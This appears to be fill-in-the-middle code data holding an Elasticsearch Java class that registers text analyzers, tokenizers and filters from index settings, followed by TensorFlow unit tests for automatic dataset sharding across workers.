org.elasticsearch.index.Index; import org.elasticsearch.index.settings.IndexSettings; import org.elasticsearch.indices.analysis.IndicesAnalysisService; import java.util.Map; import static com.google.common.collect.Maps.newHashMap; /** * */ public class AnalysisService extends AbstractIndexComponent implements CloseableComponent { private final ImmutableMap<String, NamedAnalyzer> analyzers; private final ImmutableMap<String, TokenizerFactory> tokenizers; private final ImmutableMap<String, CharFilterFactory> charFilters; private final ImmutableMap<String, TokenFilterFactory> tokenFilters; private final NamedAnalyzer defaultAnalyzer; private final NamedAnalyzer defaultIndexAnalyzer; private final NamedAnalyzer defaultSearchAnalyzer; private final NamedAnalyzer defaultSearchQuoteAnalyzer; public AnalysisService(Index index) { this(index, ImmutableSettings.Builder.EMPTY_SETTINGS, null, null, null, null, null); } @Inject<|fim▁hole|> @Nullable Map<String, TokenizerFactoryFactory> tokenizerFactoryFactories, @Nullable Map<String, CharFilterFactoryFactory> charFilterFactoryFactories, @Nullable Map<String, TokenFilterFactoryFactory> tokenFilterFactoryFactories) { super(index, indexSettings); Map<String, TokenizerFactory> tokenizers = newHashMap(); if (tokenizerFactoryFactories != null) { Map<String, Settings> tokenizersSettings = indexSettings.getGroups("index.analysis.tokenizer"); for (Map.Entry<String, TokenizerFactoryFactory> entry : tokenizerFactoryFactories.entrySet()) { String tokenizerName = entry.getKey(); TokenizerFactoryFactory tokenizerFactoryFactory = entry.getValue(); Settings tokenizerSettings = tokenizersSettings.get(tokenizerName); if (tokenizerSettings == null) { tokenizerSettings = ImmutableSettings.Builder.EMPTY_SETTINGS; } TokenizerFactory tokenizerFactory = tokenizerFactoryFactory.create(tokenizerName, tokenizerSettings); tokenizers.put(tokenizerName, tokenizerFactory); tokenizers.put(Strings.toCamelCase(tokenizerName), tokenizerFactory); } } if (indicesAnalysisService != null) { for (Map.Entry<String, PreBuiltTokenizerFactoryFactory> entry : indicesAnalysisService.tokenizerFactories().entrySet()) { 
String name = entry.getKey(); if (!tokenizers.containsKey(name)) { tokenizers.put(name, entry.getValue().create(name, ImmutableSettings.Builder.EMPTY_SETTINGS)); } name = Strings.toCamelCase(entry.getKey()); if (!name.equals(entry.getKey())) { if (!tokenizers.containsKey(name)) { tokenizers.put(name, entry.getValue().create(name, ImmutableSettings.Builder.EMPTY_SETTINGS)); } } } } this.tokenizers = ImmutableMap.copyOf(tokenizers); Map<String, CharFilterFactory> charFilters = newHashMap(); if (charFilterFactoryFactories != null) { Map<String, Settings> charFiltersSettings = indexSettings.getGroups("index.analysis.char_filter"); for (Map.Entry<String, CharFilterFactoryFactory> entry : charFilterFactoryFactories.entrySet()) { String charFilterName = entry.getKey(); CharFilterFactoryFactory charFilterFactoryFactory = entry.getValue(); Settings charFilterSettings = charFiltersSettings.get(charFilterName); if (charFilterSettings == null) { charFilterSettings = ImmutableSettings.Builder.EMPTY_SETTINGS; } CharFilterFactory tokenFilterFactory = charFilterFactoryFactory.create(charFilterName, charFilterSettings); charFilters.put(charFilterName, tokenFilterFactory); charFilters.put(Strings.toCamelCase(charFilterName), tokenFilterFactory); } } if (indicesAnalysisService != null) { for (Map.Entry<String, PreBuiltCharFilterFactoryFactory> entry : indicesAnalysisService.charFilterFactories().entrySet()) { String name = entry.getKey(); if (!charFilters.containsKey(name)) { charFilters.put(name, entry.getValue().create(name, ImmutableSettings.Builder.EMPTY_SETTINGS)); } name = Strings.toCamelCase(entry.getKey()); if (!name.equals(entry.getKey())) { if (!charFilters.containsKey(name)) { charFilters.put(name, entry.getValue().create(name, ImmutableSettings.Builder.EMPTY_SETTINGS)); } } } } this.charFilters = ImmutableMap.copyOf(charFilters); Map<String, TokenFilterFactory> tokenFilters = newHashMap(); if (tokenFilterFactoryFactories != null) { Map<String, Settings> tokenFiltersSettings = indexSettings.getGroups("index.analysis.filter"); for (Map.Entry<String, TokenFilterFactoryFactory> entry : tokenFilterFactoryFactories.entrySet()) { String tokenFilterName = entry.getKey(); TokenFilterFactoryFactory tokenFilterFactoryFactory = entry.getValue(); Settings tokenFilterSettings = tokenFiltersSettings.get(tokenFilterName); if (tokenFilterSettings == null) { tokenFilterSettings = ImmutableSettings.Builder.EMPTY_SETTINGS; } TokenFilterFactory tokenFilterFactory = tokenFilterFactoryFactory.create(tokenFilterName, tokenFilterSettings); tokenFilters.put(tokenFilterName, tokenFilterFactory); tokenFilters.put(Strings.toCamelCase(tokenFilterName), tokenFilterFactory); } } // pre initialize the globally registered ones into the map if (indicesAnalysisService != null) { for (Map.Entry<String, PreBuiltTokenFilterFactoryFactory> entry : indicesAnalysisService.tokenFilterFactories().entrySet()) { String name = entry.getKey(); if (!tokenFilters.containsKey(name)) { tokenFilters.put(name, entry.getValue().create(name, ImmutableSettings.Builder.EMPTY_SETTINGS)); } name = Strings.toCamelCase(entry.getKey()); if (!name.equals(entry.getKey())) { if (!tokenFilters.containsKey(name)) { tokenFilters.put(name, entry.getValue().create(name, ImmutableSettings.Builder.EMPTY_SETTINGS)); } } } } this.tokenFilters = ImmutableMap.copyOf(tokenFilters); Map<String, AnalyzerProvider> analyzerProviders = newHashMap(); if (analyzerFactoryFactories != null) { Map<String, Settings> analyzersSettings = 
indexSettings.getGroups("index.analysis.analyzer"); for (Map.Entry<String, AnalyzerProviderFactory> entry : analyzerFactoryFactories.entrySet()) { String analyzerName = entry.getKey(); AnalyzerProviderFactory analyzerFactoryFactory = entry.getValue(); Settings analyzerSettings = analyzersSettings.get(analyzerName); if (analyzerSettings == null) { analyzerSettings = ImmutableSettings.Builder.EMPTY_SETTINGS; } AnalyzerProvider analyzerFactory = analyzerFactoryFactory.create(analyzerName, analyzerSettings); analyzerProviders.put(analyzerName, analyzerFactory); } } if (indicesAnalysisService != null) { for (Map.Entry<String, PreBuiltAnalyzerProviderFactory> entry : indicesAnalysisService.analyzerProviderFactories().entrySet()) { String name = entry.getKey(); if (!analyzerProviders.containsKey(name)) { analyzerProviders.put(name, entry.getValue().create(name, ImmutableSettings.Builder.EMPTY_SETTINGS)); } name = Strings.toCamelCase(entry.getKey()); if (!name.equals(entry.getKey())) { if (!analyzerProviders.containsKey(name)) { analyzerProviders.put(name, entry.getValue().create(name, ImmutableSettings.Builder.EMPTY_SETTINGS)); } } } } if (!analyzerProviders.containsKey("default")) { analyzerProviders.put("default", new StandardAnalyzerProvider(index, indexSettings, null, "default", ImmutableSettings.Builder.EMPTY_SETTINGS)); } if (!analyzerProviders.containsKey("default_index")) { analyzerProviders.put("default_index", analyzerProviders.get("default")); } if (!analyzerProviders.containsKey("default_search")) { analyzerProviders.put("default_search", analyzerProviders.get("default")); } if (!analyzerProviders.containsKey("default_search_quoted")) { analyzerProviders.put("default_search_quoted", analyzerProviders.get("default_search")); } Map<String, NamedAnalyzer> analyzers = newHashMap(); for (AnalyzerProvider analyzerFactory : analyzerProviders.values()) { if (analyzerFactory instanceof CustomAnalyzerProvider) { ((CustomAnalyzerProvider) analyzerFactory).build(this); } Analyzer analyzerF = analyzerFactory.get(); if (analyzerF == null) { throw new ElasticSearchIllegalArgumentException("analyzer [" + analyzerFactory.name() + "] created null analyzer"); } NamedAnalyzer analyzer; // if we got a named analyzer back, use it... if (analyzerF instanceof NamedAnalyzer) { analyzer = (NamedAnalyzer) analyzerF; } else { analyzer = new NamedAnalyzer(analyzerFactory.name(), analyzerFactory.scope(), analyzerF); } analyzers.put(analyzerFactory.name(), analyzer); analyzers.put(Strings.toCamelCase(analyzerFactory.name()), analyzer); String strAliases = indexSettings.get("index.analysis.analyzer." + analyzerFactory.name() + ".alias"); if (strAliases != null) { for (String alias : Strings.commaDelimitedListToStringArray(strAliases)) { analyzers.put(alias, analyzer); } } String[] aliases = indexSettings.getAsArray("index.analysis.analyzer." + analyzerFactory.name() + ".alias"); for (String alias : aliases) { analyzers.put(alias, analyzer); } } defaultAnalyzer = analyzers.get("default"); if (defaultAnalyzer == null) { throw new ElasticSearchIllegalArgumentException("no default analyzer configured"); } defaultIndexAnalyzer = analyzers.containsKey("default_index") ? analyzers.get("default_index") : analyzers.get("default"); defaultSearchAnalyzer = analyzers.containsKey("default_search") ? analyzers.get("default_search") : analyzers.get("default"); defaultSearchQuoteAnalyzer = analyzers.containsKey("default_search_quote") ? 
analyzers.get("default_search_quote") : defaultSearchAnalyzer; this.analyzers = ImmutableMap.copyOf(analyzers); } public void close() { for (NamedAnalyzer analyzer : analyzers.values()) { if (analyzer.scope() == AnalyzerScope.INDEX) { try { analyzer.close(); } catch (NullPointerException e) { // because analyzers are aliased, they might be closed several times // an NPE is thrown in this case, so ignore.... } catch (Exception e) { logger.debug("failed to close analyzer " + analyzer); } } } } public NamedAnalyzer analyzer(String name) { return analyzers.get(name); } public NamedAnalyzer defaultAnalyzer() { return defaultAnalyzer; } public NamedAnalyzer defaultIndexAnalyzer() { return defaultIndexAnalyzer; } public NamedAnalyzer defaultSearchAnalyzer() { return defaultSearchAnalyzer; } public NamedAnalyzer defaultSearchQuoteAnalyzer() { return defaultSearchQuoteAnalyzer; } public TokenizerFactory tokenizer(String name) { return tokenizers.get(name); } public CharFilterFactory charFilter(String name) { return charFilters.get(name); } public TokenFilterFactory tokenFilter(String name) { return tokenFilters.get(name); } }<|fim▁end|>
public AnalysisService(Index index, @IndexSettings Settings indexSettings, @Nullable IndicesAnalysisService indicesAnalysisService, @Nullable Map<String, AnalyzerProviderFactory> analyzerFactoryFactories,
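The registry pattern in the AnalysisService file above — register each factory under both its configured name and a camelCase alias, let configured entries win over pre-built ones, then fall back through a chain of defaults — can be sketched outside Elasticsearch in a few lines of Python (the names and default chain here are illustrative, not the Elasticsearch API):

def to_camel_case(name):
    # "simple_pattern" -> "simplePattern", mirroring the dual registration above
    head, *rest = name.split("_")
    return head + "".join(part.capitalize() for part in rest)

def build_registry(configured, prebuilt):
    # Configured entries win; pre-built ones only fill gaps, under both name styles.
    registry = {}
    for name, factory in configured.items():
        registry[name] = factory
        registry[to_camel_case(name)] = factory
    for name, factory in prebuilt.items():
        registry.setdefault(name, factory)
        registry.setdefault(to_camel_case(name), factory)
    return registry

analyzers = build_registry(
    configured={"my_analyzer": object()},
    prebuilt={"standard": object(), "simple_pattern": object()},
)
# Default chain: default_index / default_search fall back to "default" when absent.
analyzers.setdefault("default", analyzers["standard"])
analyzers.setdefault("default_index", analyzers["default"])
analyzers.setdefault("default_search", analyzers["default"])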
<|file_name|>auto_shard_dataset_test.py<|end_file_name|><|fim▁begin|># Copyright 2019 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for the private `_AutoShardDataset` transformation.""" import os from absl.testing import parameterized from tensorflow.core.example import example_pb2 from tensorflow.core.example import feature_pb2 from tensorflow.python.data.experimental.ops import cardinality from tensorflow.python.data.experimental.ops import distribute from tensorflow.python.data.experimental.ops import interleave_ops from tensorflow.python.data.experimental.ops import readers from tensorflow.python.data.experimental.ops import testing from tensorflow.python.data.experimental.ops import unique from tensorflow.python.data.kernel_tests import checkpoint_test_base from tensorflow.python.data.kernel_tests import test_base from tensorflow.python.data.kernel_tests import tf_record_test_base from tensorflow.python.data.ops import dataset_ops from tensorflow.python.data.ops import options as options_lib from tensorflow.python.data.ops import readers as core_readers from tensorflow.python.framework import combinations from tensorflow.python.framework import dtypes from tensorflow.python.framework import errors from tensorflow.python.lib.io import python_io from tensorflow.python.ops import parsing_ops from tensorflow.python.ops import string_ops from tensorflow.python.platform import test def chunk(l, n): for i in range(0, len(l), n): yield l[i:i + n] class AutoShardDatasetTest(tf_record_test_base.TFRecordTestBase, parameterized.TestCase): def setUp(self): super(AutoShardDatasetTest, self).setUp() self._num_files = 10 self._num_records = 10 self._filenames = self._createFiles() def getAllDatasetElements(self, dataset): actual = [] next_fn = self.getNext(dataset) while True: try: actual.append(self.evaluate(next_fn())) except errors.OutOfRangeError: break return actual def assertDatasetProducesWithShuffle(self, dataset, expected, batch, num_examples, shuffle): if shuffle: actual = [] next_fn = self.getNext(dataset) for _ in range(num_examples): elem = self.evaluate(next_fn()) if isinstance(elem, tuple): actual.extend(elem) else: actual.extend(elem.tolist()) self.assertCountEqual(actual, expected) with self.assertRaises(errors.OutOfRangeError): self.evaluate(next_fn()) else: self.assertDatasetProduces(dataset, list(chunk(expected, batch))) @combinations.generate( combinations.times( test_base.default_test_combinations(), combinations.combine(shuffle=[True, False]))) def testFlatMapReaderPipeline(self, shuffle): dataset = dataset_ops.Dataset.list_files( self._filenames, shuffle=shuffle) dataset = dataset.flat_map(core_readers.TFRecordDataset) dataset = dataset.batch(5) dataset = distribute._AutoShardDataset(dataset, 5, 3) expected = [ b"Record %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension for f in (3, 8) for r in range(0, 10) ] 
self.assertDatasetProducesWithShuffle(dataset, expected, 5, 4, shuffle) @combinations.generate( combinations.times(test_base.default_test_combinations(), combinations.combine(batch_size=[1, 3, 10]))) def testDatasetOfReaderDatasetsPipeline(self, batch_size): # This tests a scenario where a list_files main return multiple files # due to the glob containing wildcards. def batch(iterator, n): l = len(iterator) for i in range(0, l, n): yield iterator[i:min(i + n, l)] datasets = [] for files in batch(self._filenames, batch_size): datasets.append( dataset_ops.Dataset.list_files(files, shuffle=False).map( core_readers.TFRecordDataset)) dataset = dataset_ops.Dataset.from_tensor_slices(datasets) dataset = dataset.flat_map(lambda x: x) # Simulate additional ops in between flat_map and interleave. This should be # a no-op since if ShardDataset is placed right after flat_map, we will only # have two datasets left at this point. dataset = dataset.prefetch(1) dataset = dataset.prefetch(1) dataset = dataset.interleave( lambda x: x, cycle_length=1, num_parallel_calls=1) dataset = distribute._AutoShardDataset(dataset, 5, 0) expected = [ b"Record %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension for f in (0, 5) for r in range(0, 10) ] self.assertDatasetProduces(dataset, expected) @combinations.generate(test_base.default_test_combinations()) def testZipReaderPipeline(self): dataset1 = dataset_ops.Dataset.list_files( self._filenames, shuffle=False) dataset1 = dataset1.apply( interleave_ops.parallel_interleave(core_readers.TFRecordDataset, 10)) dataset2 = dataset_ops.Dataset.list_files( self._filenames, shuffle=False) dataset2 = dataset2.apply( interleave_ops.parallel_interleave(core_readers.TFRecordDataset, 10)) dataset = dataset_ops.Dataset.zip((dataset1, dataset2)) dataset = distribute._AutoShardDataset(dataset, 5, 3) expected = [ (b"Record %d of file %d" % (r, f), b"Record %d of file %d" % (r, f)) # pylint:disable=g-complex-comprehension for r in range(0, 10) for f in (3, 8) ] self.assertDatasetProduces(dataset, expected) @combinations.generate( combinations.times( test_base.default_test_combinations(), combinations.combine(shuffle=[True, False]))) def testConcatenateReaderPipeline(self, shuffle): dataset1 = dataset_ops.Dataset.list_files( self._filenames, shuffle=shuffle) dataset1 = dataset1.apply( interleave_ops.parallel_interleave(core_readers.TFRecordDataset, 10)) dataset1 = dataset1.batch(5) dataset2 = dataset_ops.Dataset.list_files( self._filenames, shuffle=shuffle) dataset2 = dataset2.apply( interleave_ops.parallel_interleave(core_readers.TFRecordDataset, 10)) dataset2 = dataset2.batch(5) dataset = dataset1.concatenate(dataset2) dataset = distribute._AutoShardDataset(dataset, 5, 3) expected = [ b"Record %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension for r in range(0, 10) for f in (3, 8) ] expected += expected self.assertDatasetProducesWithShuffle(dataset, expected, 5, 8, shuffle) @combinations.generate( combinations.times( test_base.default_test_combinations(), combinations.combine(shuffle=[True, False]))) def testPipelineWithMap(self, shuffle): dataset = dataset_ops.Dataset.list_files(self._filenames, shuffle=False) dataset = dataset.apply( interleave_ops.parallel_interleave(core_readers.TFRecordDataset, 10)) dataset = dataset.map(lambda x: string_ops.substr_v2(x, 2, 1000)) dataset = dataset.batch(5) dataset = distribute._AutoShardDataset(dataset, 5, 3) expected = [ b"cord %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension for r in range(0, 10) for f 
in (3, 8) ] self.assertDatasetProducesWithShuffle(dataset, expected, 5, 4, shuffle) @combinations.generate(test_base.default_test_combinations()) def testDirectFilenameTFRecordReaderPipeline(self): dataset = core_readers.TFRecordDataset(self._filenames) dataset = distribute._AutoShardDataset(dataset, 5, 0) expected = [ b"Record %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension for f in (0, 5) for r in range(0, 10) ] self.assertDatasetProduces(dataset, expected) @combinations.generate( combinations.times( test_base.default_test_combinations(), combinations.combine(shuffle=[True, False]))) def testValidPipelineWithRangeDataset(self, shuffle): dataset = dataset_ops.Dataset.range(self._num_files) dataset = dataset.map(lambda n: string_ops.string_join( # pylint:disable=g-long-lambda [self.get_temp_dir(), string_ops.string_format("/tf_record.{}.txt", [n])])) dataset = dataset.apply( interleave_ops.parallel_interleave(core_readers.TFRecordDataset, 10)) dataset = dataset.map(lambda x: string_ops.substr_v2(x, 2, 1000)) dataset = dataset.batch(5) dataset = distribute._AutoShardDataset(dataset, 5, 3) expected = [ b"cord %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension for r in range(0, 10) for f in (3, 8) ] self.assertDatasetProducesWithShuffle(dataset, expected, 5, 4, shuffle) @combinations.generate( combinations.times( test_base.default_test_combinations(), combinations.combine(params=[(1, 0, 10, 10), (2, 1, 20, 5), (10, 1, 1, 10)]))) def testStandardReaderPipeline(self, params): num_epochs, index, batch_size, parallel_reads = params dataset = readers.make_tf_record_dataset( file_pattern=self._filenames, num_epochs=num_epochs, batch_size=batch_size, parser_fn=None, num_parallel_reads=parallel_reads, drop_final_batch=True, shuffle=False) dataset = distribute._AutoShardDataset(dataset, 2, index) outputs = self.getNext(dataset) self._verify_records( outputs, batch_size=batch_size, file_index=[i for i in range(index, self._num_records, 2)], num_epochs=num_epochs, interleave_cycle_length=parallel_reads,<|fim▁hole|> @combinations.generate( combinations.times( test_base.default_test_combinations(), combinations.combine(shuffle=[True, False]))) def testSampleResNetPipeline(self, shuffle): dataset = dataset_ops.Dataset.list_files( self._filenames, shuffle=shuffle) dataset = dataset.apply( interleave_ops.parallel_interleave(core_readers.TFRecordDataset, 10)) dataset = dataset.batch(5) dataset = distribute._AutoShardDataset(dataset, 5, 3) expected = [ b"Record %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension for r in range(0, 10) for f in (3, 8) ] self.assertDatasetProducesWithShuffle(dataset, expected, 5, 4, shuffle) @combinations.generate( combinations.times( test_base.default_test_combinations(), combinations.combine(sharding_policy=[ options_lib.AutoShardPolicy.DATA, options_lib.AutoShardPolicy.AUTO ]))) def testShardByDataBeforePrefetch(self, sharding_policy): dataset = dataset_ops.Dataset.range(4) dataset = dataset.apply(testing.assert_next(["Shard", "Prefetch"])) dataset = dataset.prefetch(1) options = options_lib.Options() options.experimental_distribute.auto_shard_policy = sharding_policy dataset = dataset.with_options(options) dataset = distribute._AutoShardDataset(dataset, 2, 0) self.assertDatasetProduces(dataset, [0, 2]) @combinations.generate( combinations.times( test_base.default_test_combinations(), combinations.times(combinations.combine( sharding_policy=[options_lib.AutoShardPolicy.DATA, options_lib.AutoShardPolicy.FILE]), 
combinations.combine(shuffle=[True, False])))) def testReplicateAndShardProduceDisjointData(self, shuffle, sharding_policy): dataset = dataset_ops.Dataset.list_files(self._filenames, shuffle=shuffle) dataset = dataset.flat_map(core_readers.TFRecordDataset) graph_def = dataset._as_serialized_graph( strip_device_assignment=True, external_state_policy=options_lib.ExternalStatePolicy.WARN) options = options_lib.Options() options.experimental_distribute.auto_shard_policy = sharding_policy ds1 = distribute._RemoteDataset(graph_def, "/device:CPU:0", dataset.element_spec) ds2 = distribute._RemoteDataset(graph_def, "/device:CPU:0", dataset.element_spec) ds1 = ds1.with_options(options) ds2 = ds2.with_options(options) ds1 = distribute._AutoShardDataset(ds1, 2, 0) ds2 = distribute._AutoShardDataset(ds2, 2, 1) elems1 = set(self.getAllDatasetElements(ds1)) elems2 = set(self.getAllDatasetElements(ds2)) self.assertEmpty(elems1.intersection(elems2)) @combinations.generate(test_base.default_test_combinations()) def testWorkersGreaterThanNumFilesWithDataSharding(self): options = options_lib.Options() options.experimental_distribute.auto_shard_policy = ( options_lib.AutoShardPolicy.DATA) dataset = core_readers._TFRecordDataset(self._filenames) dataset = dataset.with_options(options) dataset = distribute._AutoShardDataset(dataset, 5, 0) # Should return "Record (0,5) of file (0 --> 9)" since we are sharding by # individual elements, we should be able to get some data from all files. expected = [ b"Record %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension for f in range(0, 10) for r in (0, 5) ] self.assertDatasetProduces(dataset, expected) @combinations.generate(test_base.default_test_combinations()) def testAutoshardPolicyOff(self): options = options_lib.Options() options.experimental_distribute.auto_shard_policy = ( options_lib.AutoShardPolicy.OFF) dataset = core_readers._TFRecordDataset(self._filenames) dataset = dataset.with_options(options) dataset = distribute._AutoShardDataset(dataset, 5, 0) # Should return every record in every file since autosharding is turned off. expected = [ b"Record %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension for f in range(0, 10) for r in range(0, 10) ] self.assertDatasetProduces(dataset, expected) @combinations.generate(test_base.default_test_combinations()) def testFileShardingWithoutReaderDatasetOp(self): options = options_lib.Options() options.experimental_distribute.auto_shard_policy = ( options_lib.AutoShardPolicy.FILE) dataset = dataset_ops.Dataset.range(1024) dataset = dataset.with_options(options) # We are specifying that we want a file sharding policy, and this pipeline # doesn't start with file reading, so we should error out. with self.assertRaises(errors.NotFoundError): dataset = distribute._AutoShardDataset(dataset, 10, 0) self.evaluate(self.getNext(dataset)()) @combinations.generate(test_base.default_test_combinations()) def testWorkersGreaterThanNumFiles(self): dataset = dataset_ops.Dataset.list_files(self._filenames) dataset = dataset.apply( interleave_ops.parallel_interleave(core_readers.TFRecordDataset, 10)) dataset = dataset.batch(5) dataset = distribute._AutoShardDataset(dataset, 500, 499) self.assertDatasetProduces(dataset, []) @combinations.generate(test_base.default_test_combinations()) def testTFRecordReaderWithDirectFileNames(self): # Using `_TFRecordDataset` creates a raw op rather than wrapping it around # a flat_map automatically. 
dataset = core_readers._TFRecordDataset(self._filenames) dataset = distribute._AutoShardDataset(dataset, 5, 0) expected = [ b"Record %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension for f in range(0, 10) for r in (0, 5) ] self.assertDatasetProduces(dataset, expected) @combinations.generate(test_base.default_test_combinations()) def testTFRecordReaderWithDirectFileNamesAndShapes(self): # Using `_TFRecordDataset` creates a raw op rather than wrapping it around # a flat_map automatically. dataset = core_readers._TFRecordDataset(self._filenames) # BatchDataset contains `output_types` and `output_shapes` dataset = dataset.batch(5) dataset = distribute._AutoShardDataset(dataset, 2, 0) expected = [ b"Record %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension for f in range(0, 10) for r in range(0, 5) ] self.assertDatasetProduces(dataset, list(chunk(expected, 5))) @combinations.generate(test_base.default_test_combinations()) def testShardOutOfRange(self): dataset = dataset_ops.Dataset.range(5) with self.assertRaises(errors.InvalidArgumentError): dataset = distribute._AutoShardDataset(dataset, 10, 0) self.evaluate(self.getNext(dataset)()) @combinations.generate(test_base.default_test_combinations()) def testShardOutOfRangeEmptyDataset(self): dataset = dataset_ops.Dataset.range(0) with self.assertRaises(errors.OutOfRangeError): dataset = distribute._AutoShardDataset(dataset, 10, 0) self.evaluate(self.getNext(dataset)()) @combinations.generate(test_base.default_test_combinations()) def testNoReaderPipelines(self): dataset = dataset_ops.Dataset.range(1024) dataset = distribute._AutoShardDataset(dataset, 2, 0) self.assertDatasetProduces(dataset, [i for i in range(1024) if i % 2 == 0]) @combinations.generate(test_base.default_test_combinations()) def testUnknownOpInPipelineStillShardsAtTheEnd(self): dataset = dataset_ops.Dataset.list_files(self._filenames, shuffle=False) dataset = dataset.flat_map(core_readers.TFRecordDataset) dataset = dataset.apply(unique.unique()) dataset = distribute._AutoShardDataset(dataset, 5, 0) expected = [ b"Record %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension for f in range(0, 10) for r in (0, 5) ] self.assertDatasetProduces(dataset, expected) @combinations.generate(test_base.default_test_combinations()) def testInvalidWorkerIndex(self): dataset = dataset_ops.Dataset.list_files(self._filenames) dataset = dataset.flat_map(core_readers.TFRecordDataset) dataset = dataset.batch(5) with self.assertRaises(errors.InvalidArgumentError): dataset = distribute._AutoShardDataset(dataset, 2, 2) self.evaluate(self.getNext(dataset)()) @combinations.generate(test_base.default_test_combinations()) def testAssertCardinality(self): dataset = dataset_ops.Dataset.list_files(self._filenames, shuffle=False) dataset = dataset.flat_map(core_readers.TFRecordDataset) dataset = dataset.batch(5) dataset = dataset.apply(cardinality.assert_cardinality(42)) dataset = distribute._AutoShardDataset(dataset, 5, 0) expected = [ b"Record %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension for f in (0, 5) for r in range(0, 10) ] self.assertDatasetProduces(dataset, list(chunk(expected, 5))) @combinations.generate(test_base.default_test_combinations()) def testMakeBatchedFeaturesDataset(self): files = 2 records_per_file = 5 def make_record(file_index): example = example_pb2.Example( features=feature_pb2.Features( feature={ "file": feature_pb2.Feature( int64_list=feature_pb2.Int64List(value=[file_index])), })) return example.SerializeToString() filenames = 
[] for file_index in range(files): filename = os.path.join(self.get_temp_dir(), "tf_record.%d.txt" % file_index) filenames.append(filename) writer = python_io.TFRecordWriter(filename) for _ in range(records_per_file): writer.write(make_record(file_index)) writer.close() dataset = readers.make_batched_features_dataset( file_pattern=filenames, batch_size=records_per_file, features={ "file": parsing_ops.FixedLenFeature([], dtypes.int64), }, reader=core_readers.TFRecordDataset, num_epochs=1) # We should shard at the file level, so that all records come from file 0. dataset = distribute._AutoShardDataset(dataset, 2, 0) dataset = dataset.unbatch() output = self.getDatasetOutput(dataset) files = [elem["file"] for elem in output] self.assertEqual(files, [0] * records_per_file) @combinations.generate(test_base.default_test_combinations()) def testHintShardingValidPattern(self): options = options_lib.Options() options.experimental_distribute.auto_shard_policy = ( options_lib.AutoShardPolicy.HINT) dataset = dataset_ops.Dataset.range(100).shard(distribute.SHARD_HINT, 0) dataset = dataset.with_options(options) dataset = distribute._AutoShardDataset(dataset, 10, 0) self.assertDatasetProduces(dataset, list(range(0, 100, 10))) @combinations.generate(test_base.default_test_combinations()) def testHintShardingInvalidPattern(self): options = options_lib.Options() options.experimental_distribute.auto_shard_policy = ( options_lib.AutoShardPolicy.HINT) dataset = dataset_ops.Dataset.range(100).shard(1, 0) dataset = dataset.with_options(options) dataset = distribute._AutoShardDataset(dataset, 10, 0) self.assertDatasetProduces(dataset, list(range(100))) @combinations.generate( combinations.times( test_base.default_test_combinations(), combinations.combine( auto_shard_policy=list(options_lib.AutoShardPolicy)))) def testEnumerateAutoShardPolicies(self, auto_shard_policy): """Verifies tf.data handles every auto-shard policy with no errors.""" dataset = dataset_ops.Dataset.list_files(self._filenames, shuffle=False) dataset = dataset.flat_map(core_readers.TFRecordDataset) dataset = dataset.batch(5) options = options_lib.Options() options.experimental_distribute.auto_shard_policy = auto_shard_policy dataset = dataset.with_options(options) dataset = distribute._AutoShardDataset(dataset, 5, 3) self.getDatasetOutput(dataset, requires_initialization=True) class AutoShardWithRebatchDatasetTest(tf_record_test_base.TFRecordTestBase, parameterized.TestCase): def _setUpFiles(self, num_files, num_records_per_file): self._num_files = num_files self._num_records = num_records_per_file self._filenames = self._createFiles() @combinations.generate(test_base.default_test_combinations()) def testFileShardingWithLegacyRebatch(self): # Tests that RebatchDatasetV1 is a passthrough op. self._setUpFiles(num_files=5, num_records_per_file=10) dataset = dataset_ops.Dataset.list_files(self._filenames, shuffle=False) dataset = dataset.apply( testing.assert_next(["Shard", "FlatMap", "Batch", "Rebatch"])) dataset = dataset.flat_map(core_readers.TFRecordDataset) dataset = dataset.batch(5) dataset = distribute._LegacyRebatchDataset(dataset, num_replicas=5) dataset = distribute._AutoShardDataset(dataset, 5, 3) expected = [[self._record(3, i)] for i in range(10)] self.assertDatasetProduces(dataset, expected) @combinations.generate(test_base.default_test_combinations()) def testFileShardingWithRebatch(self): # Tests that RebatchDatasetV2 is a passthrough op. 
self._setUpFiles(num_files=3, num_records_per_file=5) dataset = dataset_ops.Dataset.list_files(self._filenames, shuffle=False) dataset = dataset.apply( testing.assert_next(["Shard", "FlatMap", "Batch", "Rebatch"])) dataset = dataset.flat_map(core_readers.TFRecordDataset) dataset = dataset.batch(5) dataset = distribute._RebatchDataset(dataset, batch_sizes=[2, 1, 2]) dataset = distribute._AutoShardDataset(dataset, 3, 1) expected = [[self._record(1, 0), self._record(1, 1)], [self._record(1, 2)], [self._record(1, 3), self._record(1, 4)]] self.assertDatasetProduces(dataset, expected) @combinations.generate( combinations.times( test_base.default_test_combinations(), combinations.times( combinations.combine(sharding_policy=[ options_lib.AutoShardPolicy.DATA, options_lib.AutoShardPolicy.AUTO ]), combinations.combine(with_prefetch=[True, False])))) def testUseLegacyRebatchWithDataSharding(self, sharding_policy, with_prefetch): # This test simulates a distributed environment with 3 workers, each with # 1 replica. dataset = dataset_ops.Dataset.range(8) dataset = dataset.batch(4) options = options_lib.Options() options.experimental_distribute.auto_shard_policy = sharding_policy dataset = dataset.with_options(options) # We expect the auto-shard rewrite to rewrite RebatchDatasetV2 to # RebatchDataset(V1) for correctness reasons. This will modify the output # of the dataset. worker_a_dataset = distribute._RebatchDataset( dataset, batch_sizes=[2, 1, 1]) if with_prefetch: worker_a_dataset = worker_a_dataset.prefetch(1) worker_a_dataset = distribute._AutoShardDataset( worker_a_dataset, 3, 0, num_replicas=3) expected = [[0, 1], [4, 5]] self.assertDatasetProduces(worker_a_dataset, expected) 